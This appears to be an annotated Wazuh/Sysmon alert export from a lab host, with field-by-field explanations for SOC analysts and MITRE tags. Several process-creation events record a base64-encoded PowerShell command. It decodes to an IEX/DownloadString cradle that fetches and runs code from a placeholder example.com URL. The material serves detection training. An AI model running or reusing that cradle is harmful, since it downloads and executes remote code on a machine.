SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:28.213
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcec-680a-e50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1468
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce8-680a-e30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.890+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.890+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  37
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1185951
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:29.7188541Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282819
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:29.700 ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} ProcessId: 1468 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_eamq14se.2pz.ps1 CreationUtcTime: 2025-04-24 22:36:29.700 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:29.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcec-680a-e50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1468
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_eamq14se.2pz.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:29.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:03.333+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:03.333+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534223.1188716
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:32.1375533Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282849
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:30.544 ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} ProcessId: 11608 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} ParentProcessId: 1468 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:30.544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcee-680a-e70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcec-680a-e50a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1468
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:03.350+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:03.350+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  38
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534223.1196783
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:32.3062006Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282850
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:32.285 ProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} ProcessId: 11608 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ss5qtls3.nav.ps1 CreationUtcTime: 2025-04-24 22:36:32.285 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:32.285
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcee-680a-e70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ss5qtls3.nav.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:32.285
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:04.043+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:04.043+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534224.1199552
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:34.8707334Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282895
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:33.276 ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} ProcessId: 9396 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcee-680a-e70a-000000000e00} ParentProcessId: 11608 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
